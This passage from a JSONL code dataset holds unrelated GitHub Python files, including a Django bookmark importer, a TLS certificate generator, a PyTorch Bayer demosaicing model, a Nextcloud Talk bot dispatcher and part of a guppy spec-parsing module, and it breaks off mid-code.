i += 1\n return i\n\n\nclass Command(BaseCommand):\n help = \"Load haggadah bookmarks and text.\"\n\n def handle(self, *args, **options):\n with (Path(settings.BASE_DIR) / \"data/haggadah.json\").open() as f:\n data = json.load(f)\n with transaction.atomic():\n walk(data['text'], data['schema'])\n","repo_name":"nonZero/Hagadot","sub_path":"bookmarks/management/commands/import_bookmarks.py","file_name":"import_bookmarks.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"44311856691","text":"import datetime\nimport os\nimport sys\nfrom cryptography import x509\nfrom cryptography.x509.oid import NameOID\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import rsa\n\n\n# def standardize(s):\n# return s.strip().removeprefix('http://').removeprefix('https://').removesuffix('/')\ndef standardize(s):\n s = s.strip()\n if s.startswith('http://'):\n s = s[len('http://'):]\n if s.startswith('https://'):\n s = s[len('https://'):]\n if s.endswith('/'):\n s = s[:-1]\n return s\n\n\ndef check_domain(domain):\n if domain == '':\n domain = input(\"please type domain:\\n\")\n while domain.strip() == '': domain = input()\n return check_domain(domain)\n else:\n str = input(\">>>>>>>>\\n {domain} \\n>>>>>>>>\\n[y/n (q to exit)]:\".format(domain=domain)).lower()\n if str == \"n\":\n domain = input(\"please type domain:\\n\")\n while domain.strip() == '': domain = input()\n return check_domain(domain)\n elif str == \"q\":\n sys.exit(0)\n else:\n return domain\n\n\ndef get_domain():\n fname = 'domain.txt'\n domains = []\n try:\n with open(fname, 'r', encoding='utf-8') as f:\n lines = f.readlines()\n for line in lines:\n domains.append(line)\n finally:\n for idx, domain in enumerate(domains):\n domains[idx] = standardize(domain)\n\n domain_str = \"\\n\".join(domains) if len(domains) != 0 else \"\"\n check_domain(domain_str)\n return domains\n\n\ndef generator(domains, prefix):\n root_key = rsa.generate_private_key(\n public_exponent=65537,\n key_size=2048,\n backend=default_backend()\n )\n print(' generated!')\n subject = issuer = x509.Name([\n x509.NameAttribute(NameOID.COUNTRY_NAME, u\"US\"),\n x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u\"CA\"),\n x509.NameAttribute(NameOID.LOCALITY_NAME, u\"San Jose\"),\n x509.NameAttribute(NameOID.ORGANIZATION_NAME, u\"ygeng\"),\n x509.NameAttribute(NameOID.COMMON_NAME, u\"ygeng\"),\n ])\n root_cert = x509.CertificateBuilder().subject_name(\n subject\n ).issuer_name(\n issuer\n ).public_key(\n root_key.public_key()\n ).serial_number(\n x509.random_serial_number()\n ).not_valid_before(\n datetime.datetime.utcnow()\n ).not_valid_after(\n datetime.datetime.utcnow() + datetime.timedelta(days=3650)\n ).add_extension(\n x509.BasicConstraints(ca=True, path_length=None), critical=True\n ).sign(root_key, hashes.SHA256(), default_backend())\n print(' generated!')\n\n # Now we want to generate a cert from that root\n cert_key = rsa.generate_private_key(\n public_exponent=65537,\n key_size=2048,\n backend=default_backend()\n )\n print(' generated!')\n new_subject = x509.Name([\n x509.NameAttribute(NameOID.COUNTRY_NAME, u\"US\"),\n x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u\"CA\"),\n x509.NameAttribute(NameOID.LOCALITY_NAME, u\"San Jose\"),\n x509.NameAttribute(NameOID.ORGANIZATION_NAME, u\"testAPP\"),\n x509.NameAttribute(NameOID.COMMON_NAME, u\"testAPP\")\n ])\n cert = x509.CertificateBuilder().subject_name(\n new_subject\n ).issuer_name(\n root_cert.issuer\n ).public_key(\n cert_key.public_key()\n ).serial_number(\n x509.random_serial_number()\n ).not_valid_before(\n datetime.datetime.utcnow()\n ).not_valid_after(\n datetime.datetime.utcnow() + datetime.timedelta(days=90)\n ).add_extension(\n x509.SubjectAlternativeName([x509.DNSName(domain) for domain in domains]), # add domain info\n critical=False,\n ).sign(root_key, hashes.SHA256(), default_backend())\n print(' generated!')\n\n ROOT_CERT_FILE = prefix + '/ca.crt'\n CERT_FILE = prefix + \"/app.crt\"\n KEY_FILE = prefix + \"/app.key\"\n\n # with open(ROOT_CERT_FILE, \"wb\") as root_cert_file:\n # root_cert_file.write(root_cert.public_bytes(serialization.Encoding.PEM))\n\n with open(CERT_FILE, \"wb\") as cert_file:\n cert_file.write(cert.public_bytes(serialization.Encoding.PEM))\n\n with open(KEY_FILE, \"wb\") as key_file:\n key_file.write(cert_key.private_bytes(serialization.Encoding.PEM,\n serialization.PrivateFormat.TraditionalOpenSSL,\n serialization.NoEncryption()))\n\n\nif __name__ == \"__main__\":\n domains = get_domain()\n prefix = \"APP_\" + domains[0].split(\".fortiweb\", 1)[0]\n if os.path.isdir(prefix):\n if os.path.exists(prefix + \"/app.crt\"):\n print(\"custom cert exist!\")\n sys.exit(0)\n else:\n os.makedirs(prefix)\n generator(domains, prefix + '/')\n","repo_name":"yijiegeng/cert_generator","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":4959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18513338889","text":"from apps.core.models import Person\nfrom rest_framework.serializers import ModelSerializer\nfrom apps.location.serializers.city_serializers import CitySerializer, CreateCitySerializer\n\n\nclass UserSerializer(ModelSerializer):\n city = CreateCitySerializer(many=False, read_only=True)\n\n class Meta:\n model = Person\n fields = [\n \"id\",\n \"image\",\n \"name\",\n \"username\",\n \"contact\",\n \"latitude\",\n \"longitude\",\n \"is_moderator\",\n \"is_active\",\n \"is_admin\",\n \"city\",\n ]\n\n\nclass CreatePersonSerializer(ModelSerializer):\n class Meta:\n model = Person\n fields = [\n \"id\",\n \"contact\",\n \"city\",\n \"user\",\n ]\n\n\nclass UpdatePersonSerializer(ModelSerializer):\n class Meta:\n model = Person\n fields = [\n \"image\",\n \"contact\",\n \"latitude\",\n \"longitude\",\n \"city\",\n ]\n\n\nclass UpdatePersonIamgeSerializer(ModelSerializer):\n class Meta:\n model = Person\n fields = [\"image\"]\n","repo_name":"PedroHenriqueDevBR/adocao-animal-web","sub_path":"backend/animal_adoption/apps/account/serializers/user_serializers.py","file_name":"user_serializers.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"44094125228","text":"# Polar plot:\nimport pylab as plb \n\nplb.axes([0.065,0.065,0.88,0.88], polar = True)\n\nq = 24\nt = plb.arange(0.015, 3*plb.pi, 3*plb.pi/q)\nrad = 12 * plb.rand(q)\nw = plb.pi / 4 * plb.rand(q)\nba = plb.bar(t, rad, width = w)\n\nfor r , bar in zip(rad, ba):\n bar.set_facecolor(plb.cm.jet(r/12.0))\n bar.set_alpha(0.75)\n\nplb.show()\n\n\n","repo_name":"anupkumarn/Berkeley-Class","sub_path":"L6_E9.py","file_name":"L6_E9.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73349963251","text":"data_dir = '../Dataset/Dubai'\nimage_dir = 'IMAGES'\nlabel_dir = 'LABELS'\nphi = 4\nepochs = 50\nsteps = 1000\nbatch_size = 2\nweight_path = 'imagenet'\nimage_size = (512, 640, 768, 896, 1024, 1280, 1408)[phi]\nclasses = {'DAMAGE': 0}\n","repo_name":"jahongir7174/EfficientDet-tf","sub_path":"utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"3849535745","text":"from handleData import *\nfrom pipe import *\nfrom sklearn.cluster import KMeansm\nos.chdir('..')\nos.chdir('..')\nos.chdir('..')\nos.chdir('Data')\n\naggr_surv = pd.read_excel('agg_survey_vars.xlsx')\naggr_surv_filled = replace_value(aggr_surv,list(aggr_surv),np.NaN,0)\nvar_names = list(aggr_surv_filled)\nvar_names.remove('economycode')\nvar_names.remove('economy')\ncountries = aggr_surv_filled['economy']\naggr_nums_only = aggr_surv_filled[var_names]\ntest = KMeans(n_init = 200)\nclusters = pd.DataFrame(test.fit_predict(aggr_nums_only))\ncountries_clusters = pd.concat([countries, clusters],axis=1)\ncluster_sort = countries_clusters.sort_values(0)\n\nmacro_surv = pd.read_excel('macro_vars.xlsx')\nmacro_surv_nums = macro_surv.convert_objects(convert_numeric=True)\nmacro_surv_filled = replace_value(macro_surv_nums,list(macro_surv_nums),np.NaN,0)\nvar_names = list(macro_surv_filled)\nvar_names.remove('economycode')\nvar_names.remove('economy')\nmacro_countries = macro_surv_filled['economy']\nvar_nums_only = macro_surv_filled[var_names]\nmacro_clusters = pd.DataFrame(test.fit_predict(var_nums_only))\nmacro_countries_clusters = pd.concat([macro_countries, macro_clusters],axis=1)\nmacro_cluster_sort = macro_countries_clusters.sort_values(0)\n\nos.chdir('Output')\ncluster_sort.to_csv(\"sample_country_clusters.csv\")\nmacro_cluster_sort.to_csv(\"sample_macro_country_clusters.csv\")","repo_name":"abhig94/CAPP-30254","sub_path":"Project/Pipeline/cluster_muck.py","file_name":"cluster_muck.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9425526366","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nimport argparse\nfrom tools.model_runner import model_inference\nfrom PIL import Image\nfrom pathlib import Path\n\n# support BayerBG to rgb\n\n\nclass BayerNet(torch.nn.Module):\n\n def __init__(self):\n super(BayerNet, self).__init__()\n self.kernels = torch.tensor([\n [\n [0, 0, 0],\n [0, 1, 0],\n [0, 0, 0],\n ],\n [\n [0, 0.25, 0],\n [0.25, 0, 0.25],\n [0, 0.25, 0],\n ],\n [\n [0.25, 0, 0.25],\n [0, 0, 0],\n [0.25, 0, 0.25],\n ],\n [\n [0, 0, 0],\n [0.5, 0, 0.5],\n [0, 0, 0],\n ],\n [\n [0, 0.5, 0],\n [0, 0, 0],\n [0, 0.5, 0],\n ],\n ]).view(5, 1, 3, 3)\n self.kernel0 = torch.tensor([\n [0, 0, 1.0, 0, 0],\n [0, 1.0, 0, 0, 0],\n [1.0, 0, 0, 0, 0],\n ]).view(3, 5, 1, 1)\n self.kernel1 = torch.tensor([\n [0, 0, 0, 0, 1.0],\n [1.0, 0, 0, 0, 0],\n [0, 0, 0, 1.0, 0],\n ]).view(3, 5, 1, 1)\n self.kernel2 = torch.tensor([\n [0, 0, 0, 1.0, 0],\n [1.0, 0, 0, 0, 0],\n [0, 0, 0, 0, 1.0],\n ]).view(3, 5, 1, 1)\n self.kernel3 = torch.tensor([\n [1.0, 0, 0, 0, 0],\n [0, 1.0, 0, 0, 0],\n [0, 0, 1.0, 0, 0],\n ]).view(3, 5, 1, 1)\n self.kernels2 = torch.cat((self.kernel0, self.kernel1, self.kernel2, self.kernel3),\n 0).view(12, 5, 1, 1)\n self.reflect_pad = nn.ReflectionPad2d((1, 1, 1, 1))\n\n def unshuffle_dcr(self, x):\n n, c, h, w = x.shape\n x = x.view(n, c, h // 2, 2, w // 2, 2)\n x = x.permute(0, 3, 5, 1, 2, 4).contiguous()\n x = x.view(n, 4 * c, h // 2, w // 2)\n return x\n\n def shuffle_dcr(self, x):\n n, c, h, w = x.shape\n x = x.view(n, 2, 2, c // 4, h, w)\n x = x.permute(0, 3, 4, 1, 5, 2).contiguous()\n x = x.view(n, c // 4, h * 2, w * 2)\n return x\n\n def forward(self, x):\n # x: Bx1xHxW, bayer image\n # y: Bx3xHxW, rgb image\n x_pad = self.reflect_pad(x) # (Bx1x(1+H+1)x(1+W+1))\n x_conv = nn.functional.conv2d(x_pad, self.kernels, stride=1) #[B, 5, H, W]\n x_unshuffle = self.unshuffle_dcr(x_conv) #[B, 4*5, H/2, W/2]\n a = x_unshuffle[:, :5, :, :]\n b = x_unshuffle[:, 5:10, :, :]\n c = x_unshuffle[:, 10:15, :, :]\n d = x_unshuffle[:, 15:20, :, :]\n a_conv = nn.functional.conv2d(a, self.kernel0, stride=1)\n b_conv = nn.functional.conv2d(b, self.kernel1, stride=1)\n c_conv = nn.functional.conv2d(c, self.kernel2, stride=1)\n d_conv = nn.functional.conv2d(d, self.kernel3, stride=1)\n e = torch.cat((a_conv,b_conv,c_conv,d_conv), 1)\n y = self.shuffle_dcr(e) #[B, 3, H, W]\n return y\n\n\nx = torch.randint(0, 256, (1, 1, 1024, 1024), dtype=torch.float32)\n\ninputs = {'x': x.numpy()}\nnp.savez(\"input.npz\", **inputs)\ntorch.jit.trace(BayerNet().eval(), x).save(\"bayer2rgb.pt\")\n\n","repo_name":"sophgo/tpu-mlir","sub_path":"python/samples/bayer2rgb/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3286,"program_lang":"python","lang":"en","doc_type":"code","stars":366,"dataset":"github-code","pt":"21"} +{"seq_id":"42080824319","text":"from typing import Any, Dict, Iterator, List, Optional, Union\n\nfrom exceptions import *\nfrom instaloadercontext import InstaloaderContext\n\n\nclass Post:\n\n def __init__(self, context: InstaloaderContext, node: Dict[str, Any],\n owner_profile: Optional['Profile'] = None):\n assert 'shortcode' in node or 'code' in node\n\n self._context = context\n self._node = node\n self._owner_profile = owner_profile\n self._full_metadata_dict = None # type: Optional[Dict[str, Any]]\n self._rhx_gis_str = None # type: Optional[str]\n self._location = None # type: Optional[PostLocation]\n\n\n\n @property\n def owner_username(self) -> str:\n \"\"\"The Post's lowercase owner name.\"\"\"\n return self.owner_profile.username\n\n @property\n def owner_id(self) -> int:\n \"\"\"The ID of the Post's owner.\"\"\"\n return self.owner_profile.userid\n\n @property\n def profile(self) -> str:\n \"\"\"Synonym to :attr:`~Post.owner_username`\"\"\"\n return self.owner_username\n\n\nclass Profile:\n def __init__(self, context: InstaloaderContext, node: Dict[str, Any]):\n assert 'username' in node\n self._context = context\n self._has_public_story = None # type: Optional[bool]\n self._node = node\n self._has_full_metadata = False\n self._rhx_gis = None\n self._iphone_struct_ = None\n if 'iphone_struct' in node:\n # if loaded from JSON with load_structure_from_file()\n self._iphone_struct_ = node['iphone_struct']\n\n @classmethod\n def from_username(cls, context: InstaloaderContext, username: str):\n profile = cls(context, {'username': username.lower()})\n profile._obtain_metadata() # to raise ProfileNotExistException now in case username is invalid\n return profile\n\n @classmethod\n def from_id(cls, context: InstaloaderContext, profile_id: int):\n if profile_id in context.profile_id_cache:\n return context.profile_id_cache[profile_id]\n data = context.graphql_query('7c16654f22c819fb63d1183034a5162f',\n {'user_id': str(profile_id),\n 'include_chaining': False,\n 'include_reel': True,\n 'include_suggested_users': False,\n 'include_logged_out_extras': False,\n 'include_highlight_reels': False},\n rhx_gis=context.root_rhx_gis)['data']['user']\n if data:\n profile = cls(context, data['reel']['owner'])\n else:\n raise ProfileNotExistsException(\"No profile found, the user may have blocked you (ID: \" +\n str(profile_id) + \").\")\n context.profile_id_cache[profile_id] = profile\n return profile","repo_name":"javvadasghar/Python-Instagram-Bot","sub_path":"structures.py","file_name":"structures.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30972391481","text":"from nc_helper import NCHelper\nfrom nc_chat import NCChat\nimport os\nimport importlib.util\n\nnc_agent = NCHelper()\n\ncurrent_command = {}\n\nplugin_path = 'ncbot/plugins'\n\nuser_command_cache = {}\n\n\nclass Command:\n\n def __init__(self, chat: NCChat):\n commandstr:str = chat.chat_message\n self.matched_func = False\n self.matched_plugin = False\n self.plname = None\n self.funcname = None\n self.value = None\n self.user_id = chat.user_id\n self.user_name = chat.user_name\n if not commandstr.startswith('!'):\n return\n try:\n commandpair = commandstr.split(' ',1)\n commanddetail = commandpair[0][1:].split(':')\n self.plname = commanddetail[0]\n self.funcname = commanddetail[1]\n self.value = commandpair[1]\n except Exception:\n pass\n\n\n if self.plname in current_command:\n self.matched_plugin = True\n if self.funcname in current_command[self.plname]:\n self.matched_func = True\n self.func = current_command[self.plname][self.funcname]['func'] \n\n\n def execute(self):\n try:\n return self.func(self.user_id, self.user_name, self.value)\n except Exception as e:\n return 'Something wrong happened! Please try again later.'\n\n\ndef get_default_desc():\n desc = \"You should type !Plugin:Function to talk with me.\\n\\nCurrent supported plugins are:\\n\"\n for key in current_command:\n desc += key+'\\n'\n desc += \"\\nType !Plugin to see detail about plugin.\\n\"\n desc += \"The last command will be remembered if capable, so you should not type the command first next time.\"\n return desc\n\n\ndef get_plugin_desc(plname):\n desc = 'Supported commands are:\\n'\n plugin = current_command[plname]\n for key in plugin:\n desc += f'{key}: {plugin[key][\"desc\"]}\\n'\n desc += f'type !{plname}:command input to use it.'\n return desc\n\n\ndef find_last_command(chat: NCChat):\n if not chat.chat_message.startswith('!'):\n key = f'command_{chat.user_id}'\n if key in user_command_cache:\n command = user_command_cache[key]\n chat.chat_message = f'{command} {chat.chat_message}'\n\n\ndef save_last_command(chat: NCChat, command: Command):\n if current_command[command.plname][command.funcname]['remember']:\n key = f'command_{chat.user_id}'\n user_command_cache[key] = f'!{command.plname}:{command.funcname}'\n return True\n return False\n\n\ndef dispatch(chat: NCChat):\n ret = 'test'\n #nc_agent.lock_conversation(chat.conversation_token)\n\n find_last_command(chat)\n command = Command(chat)\n if command.matched_func:\n ret = command.execute()\n if save_last_command(chat, command):\n ret += f'\\n\\n(The command !${command.plname}:{command.funcname} is remembered, type without command to continue use this function. Otherwize type other commands.)'\n elif command.matched_plugin:\n ret = get_plugin_desc(command.plname)\n else:\n ret = get_default_desc()\n #nc_agent.unlock_conversation(chat.conversation_token)\n chat.response = ret\n\n\ndef register(plname, funcname, desc, func, remember_command):\n if plname in current_command:\n current_command[plname][funcname] = {'desc':desc, 'func':func, 'remember':remember_command}\n else:\n current_command[plname] = {funcname: {'desc':desc, 'func':func, 'remember':remember_command}}\n\n\ndef load_plugin(path):\n for filename in os.listdir(path):\n tmppath = os.path.join(path, filename)\n if os.path.isfile(tmppath):\n if filename.endswith('.py') and not filename.startswith('__init'):\n spec = importlib.util.spec_from_file_location(filename[:-3], os.path.join(path, filename))\n module = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(module)\n elif os.path.isdir(tmppath):\n load_plugin(tmppath)\n\n\n\n","repo_name":"CrazyShipOne/nextcloud_talk_pybot","sub_path":"ncbot/command/commander.py","file_name":"commander.py","file_ext":"py","file_size_in_byte":4021,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"36979755975","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.product_list, name='home'),\n path('api/data', views.api_data, name='api-data'),\n path('api/district', views.api_district, name='api-district'),\n path('api/chandaKatha', views.api_chandaKatha, name='api-chandakatha')\n\n\n]\n","repo_name":"TajalTechnology/Django-vue-api-AdvanceSearch","sub_path":"Bangla_idoms/model_main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41396612232","text":"##\n# Specification entity object\n#\n# Collects information about a particular system entity or aspect.\n#\n# The entity is of a general kind\n# It is defined by the particular aspects defined for it\n# The aspects must be 'compatible', which can be relatively checked.\n# The specobject is used for:\n# * generating tests\n# * generating docs\n# * generating help\n# * by creating docstrings\n# * by providing interactive help\n#\n# For test generation, it will delegate to test implementators.\n# For doc generation, it will delegate to doc implementators.\n#\n# The functionality needed here is therefore limited.\n#\n# name\n# aspects\n#\n# There is one predefine root\n# - should we call it Universe?\n#\n# The name can be full, a dotted name, or the short, last part.\n#\n# The name is treated as an aspect.\n#\n# Each aspect definition has a primary kind\n\n# Aspect kinds\n\n\nfrom guppy.gsl.Exceptions import *\n\n\nclass SpecObject:\n def __init__(self, mod):\n self.mod = mod\n\n##\n# Specification environment\n# Collects specifications from several files\n# Maps names to specification objects\n\n\nclass SpecEnv:\n def __init__(self, mod):\n self.mod = mod\n self.unknown_nodes = []\n self.files = []\n\n def visit_default(self, node):\n print('add_unknown', node.tag)\n self.unknown_nodes.append(node)\n\n def visit_file(self, node):\n print('visit_file')\n file = FileEnv(self, node)\n self.files.append(file)\n\n def get_predefined_subjects(self, env):\n return (GuppyWorld(env),)\n\n\nclass FileEnv:\n def __init__(self, env, node):\n mod = env.mod\n self.mod = mod\n self.name = self.filename = node.arg\n self.subjects = {}\n for s in env.get_predefined_subjects(self):\n self.subjects[s.name] = s\n\n file = Subject(self, node, self.name)\n\n node.children_accept(file)\n\n def visit_aspects_of(self, node):\n name = node.arg\n subject = self.find_subject(node, name)\n subject.add_aspects(node)\n\n def def_subject(self, node, name, subject):\n if name in self.subjects:\n self.error_node(node, 'Redefinition of %r.' % name)\n self.error_node(self.subjects[name].node,\n 'Previous definition of %r.' % name)\n else:\n self.subjects[name] = subject\n\n def error_node(self, node, msg, exception=None):\n index = node.index\n lineno = index + 1\n print('%s:%s:' % (self.filename, lineno))\n print(' %r' % self.get_line(index))\n print(' %s' % msg)\n print()\n\n def find_subject(self, node, name):\n subject = self.subjects.get(name)\n if subject is None:\n self.error_node(node, 'No such subject: %r.' % name)\n return subject\n\n def get_line(self, index):\n try:\n with open(self.filename) as f:\n text = list(f.readlines())[index].rstrip()\n except Exception:\n text = None\n return text\n\n def get_subject(self, name):\n subject = self.subjects.get(name)\n if subject is None:\n subject = self.subjects[name] = Subject(self, name)\n return subject\n\n def get_aspect_subject(self, env, node):\n name = env.name+'::'+node.tag\n return self.get_subject(name)\n\n\nclass Subject:\n def __init__(self, file, node, name):\n self.file = file\n self.node = node\n self.name = name\n self.aspects = []\n\n def visit_default(self, node):\n of = node.tag.endswith('_of')\n name = node.arg\n define = name.startswith(':')\n if define:\n if of:\n\n self.file.error_node(node, \"Both 'of' and '::'.\")\n name = name[1:].strip()\n if of:\n ofsubject = self.file.find_subject(node, name)\n subject = self.new_subject_of(node, ofsubject)\n else:\n subject = Subject(self.file, node, name)\n if define:\n self.file.def_subject(node, name, subject)\n self.aspects.append(subject)\n node.children_accept(subject)\n\n def new_subject_of(self, node, of):\n tag = node.tag\n if tag == 'aspects_of':\n return AspectsOf(self.file, node, of)\n else:\n return SubjectOf(self.file, node, of)\n\n\nclass AspectsOf(Subject):\n def __init__(self, file, node, of):\n self.node = node\n self.of = of\n self.aspects = []\n\n def visit_default(self, node):\n self.of.visit_default(node)\n\n\nclass SubjectOf(Subject):\n def __init__(self, file, node, of):\n self.node = node\n self.of = of\n self.aspects = []\n\n\nclass GuppyWorld(Subject):\n def __init__(self, env):\n self.file = env\n self.name = \"Guppy World\"\n self.node = None\n self.aspects = []\n\n\n##\n# A node represented with argument splitted in components of the form:\n# .tag: arg\n# text\n# ..child\n# ...\n# ..child\n# ...\n#\n# @param tag the text of the first line before the colon\n# @param arg the text of the first line after the colon (stripped)\n# @param text the text after the the first line before the first children\n# @param children the child nodes\n# @param index line index\n# @param src describes the source\n\nclass SpecNode(object):\n __slots__ = 'tag', 'arg', 'children', 'index', 'src'\n\n def __init__(self, tag, arg, children=(), index=0, src=None):\n self.tag = tag\n self.arg = arg\n self.children = tuple(children)\n self.index = index\n self.src = src\n\n def __repr__(self):\n return '%s(%r,%r,%r)' % (\n self.__class__.__name__, self.tag, self.arg, self.children)\n\n def __str__(self):\n return '%s(%r,%r,%s)' % (\n self.__class__.__name__, self.tag, self.arg,\n '(%s)' % (','.join([str(c) for c in self.children])))\n\n def arg_accept(self, visitor, prefix='visit_'):\n if self.arg:\n node = SpecNode('text', self.arg, (), self.index)\n node.accept(visitor, prefix)\n self.children_accept(visitor, prefix)\n\n def copy(self, tag=None, arg=None, children=None, index=None, src=None):\n if tag is None:\n tag = self.tag\n if arg is None:\n arg = self.arg\n if children is None:\n children = self.children\n if index is None:\n index = self.index\n if src is None:\n src = self.src\n return self.__class__(tag, arg, children, index, src)\n\n def children_accept(self, visitor, prefix='visit_'):\n for c in self.children:\n c.accept(visitor, prefix)\n\n def accept(self, visitor, prefix='visit_'):\n m = getattr(visitor, (prefix+self.tag), None)\n if m is None:\n m = getattr(visitor, (prefix+'default'), None)\n if m is None:\n msg = 'accept: unknown: %r, %r in %r' % (\n prefix, self.tag, visitor)\n print(msg)\n raise ValueError(msg)\n return\n m(self)\n\n def error(self, msg, node=None):\n if node is None:\n node = self\n node.src.error(msg, node)\n\n def get_text(self):\n \" Get the total text of all text children, joined with and ended with '\\n' \"\n text = []\n for c in self.children:\n if c.tag == 'text':\n text.append(c.arg)\n if not c.arg.endswith('\\n'):\n text.append('\\n')\n return ''.join(text)\n\n def get_arg(self):\n arg = self.arg.strip()\n if arg.startswith(':'):\n arg = arg[1:].strip()\n return arg\n\n def get_arglist(self):\n arg = self.arg\n if arg.startswith(':'):\n arg = arg[1:]\n names = [x.strip() for x in arg.split(',')]\n if names == ['']:\n names = []\n return names\n\n def get_arg_children(self):\n if self.arg:\n children = [SpecNode('text', self.arg, (), self.index, self.src)]\n children.extend(self.children)\n else:\n children = self.children\n return children\n\n def get_arg_rest(self, nostrip=0):\n arg = self.arg\n if not nostrip:\n arg = arg.strip()\n return arg, self.children\n\n def get_arg_norest(self):\n ''' Get the arg as by self.arg,\n but make sure there are no more children.\n '''\n if self.children:\n raise SyntaxError('No children nodes expected in node: %s' % self)\n return self.arg.strip()\n\n def get_namearg(self):\n ''' Get the argument in the form of a name\n It is the argument stripped.\n And not allowed to contain : or , or new line.\n '''\n name = self.arg.strip()\n if '\\n' in name or ':' in name or ',' in name:\n raise SyntaxError('Invalid name: %r' % name)\n return name\n\n def split_attrs(self, tag=None, attrdict=False):\n if tag is None:\n tag = self.tag\n if attrdict:\n attrs = {}\n\n def addattr(tag, attr, node):\n if tag in attrs:\n node.error('Duplicate attribute: %s' % attr)\n else:\n attrs[tag] = attr\n else:\n attrs = []\n\n def addattr(tag, attr, node):\n attrs.append((tag, attr))\n children = []\n for ch in self.children:\n if ch.tag == \"with\":\n for opt in ch.children:\n if opt.arg:\n arg = opt.arg\n else:\n self.error('Bad attribute, no argument.', opt)\n if opt.children:\n self.error(\n 'Expected no children to attribute.', opt.children[0])\n if opt.arg:\n addattr(opt.tag, arg, opt)\n elif ch.tag[-1:] == '=':\n addattr(ch.tag[:-1], ch.arg, ch)\n else:\n children.append(ch)\n if len(children) == len(self.children):\n node = self\n else:\n node = self.__class__(\n tag, self.arg, children, self.index, self.src)\n return node, attrs\n\n\nclass Source:\n def __init__(self, name, lines=None, string=None, nostrip=0, debug=0, max_errors=10):\n self.filename = name\n self.lines = lines\n self.string = string\n self.nostrip = nostrip\n self.debug = debug\n self.error_reports = []\n self.max_errors = max_errors\n self.num_warnings = 0\n self.num_errors = 0\n\n def errmsg_context(self, context):\n linetext = ''\n filename = ''\n if context is not None:\n if hasattr(context, 'index'):\n index = context.index\n src = context.src\n else:\n index = context\n src = self\n if src is not None:\n filename = src.filename\n linetext = src.get_line(index=index)\n print('%s:%s:' % (filename, index+1))\n if linetext:\n print(' %s' % linetext)\n\n def error(self, message, context=None, exception=None, more=(), harmless=0):\n self.error_reports.append(\n (message, context, exception, more, harmless))\n if harmless:\n self.num_warnings += 1\n else:\n self.num_errors += 1\n\n self.errmsg_context(context)\n if harmless:\n print('* %s' % message)\n else:\n print('*** %s' % message)\n print()\n\n for msg, ctx in more:\n self.errmsg_context(ctx)\n print(' %s' % msg)\n print()\n\n if self.debug:\n import pdb\n pdb.set_trace()\n else:\n if self.num_errors >= self.max_errors:\n raise TooManyErrors('Too many errors, giving up')\n if exception is not None:\n raise exception\n\n def get_line(self, index):\n if self.lines is None:\n if self.string is None:\n if self.filename:\n try:\n with open(self.filename) as f:\n self.string = f.read()\n except Exception:\n return ''\n else:\n return ''\n self.lines = self.string.split('\\n')\n return self.lines[index]\n\n\nclass _GLUECLAMP_:\n\n _chgable_ = 'nodemap', 'SpecNode'\n\n _imports_ = (\n '_parent:DottedTree',\n '_root:re',\n '_root:os',\n )\n\n node_aliases_defs = (\n ('attr', 'attribute'),\n ('c', 'comment'),\n ('cond', 'condition'),\n ('d', 'description'),\n ('dwh', 'description_with_header'),\n ('eg', 'example'),\n ('fop', 'function_operator'),\n ('iop', 'inplace_operator'),\n ('ka', 'key_arg'),\n ('op', 'operator'),\n ('rop', 'reverse_operator'),\n ('t', 'text'),\n )\n\n def _get_node_aliases(self):\n return dict(self.node_aliases_defs)\n\n def _get_reverse_node_aliases(self):\n # Used to make names shorter\n return dict([(v, k) for k, v in self.node_aliases_defs])\n\n def _get_is_not_ascii(self):\n return self.re.compile(eval(r'u\"[\\u0080-\\uffff]\"')).search\n\n ##\n # @return A tuple of predefined subjects.\n\n def get_predefined_subjects(self):\n return (GuppyWorld(self),)\n\n ##\n # Parses a file and makes a tree of nodes\n # @param file name of file containing a dotted tree\n # @return a SpecNode object\n # @more\n # First tag is special.\n # We don't interpret the first line of the file,\n # but uses a special file tag.\n\n def node_of_file(self, file, nostrip=0):\n src = Source(name=file, nostrip=nostrip)\n dtree = self.DottedTree.parse_file(file, src)\n tag = 'file'\n arg = file\n text = dtree.tag.strip()\n children = self.nodes_of_dforest(dtree.children, src)\n index = dtree.index\n return self.node_of_tatci(tag, arg, text, children, index, src)\n\n def node_of_string(self, string, name='', nostrip=0):\n dtree = self.DottedTree.parse_string(string)\n tag = 'string'\n arg = name\n src = Source(name=name, string=string, nostrip=nostrip)\n text = dtree.tag.strip()\n index = dtree.index\n children = self.nodes_of_dforest(dtree.children, src)\n return self.node_of_tatci(tag, arg, text, children, index, src)\n\n def node_of_dtree(self, dtree, src):\n tag = dtree.tag\n textpos = tag.find('\\n')\n if textpos == -1:\n textpos = len(tag)\n\n equpos = tag.find('=', 0, 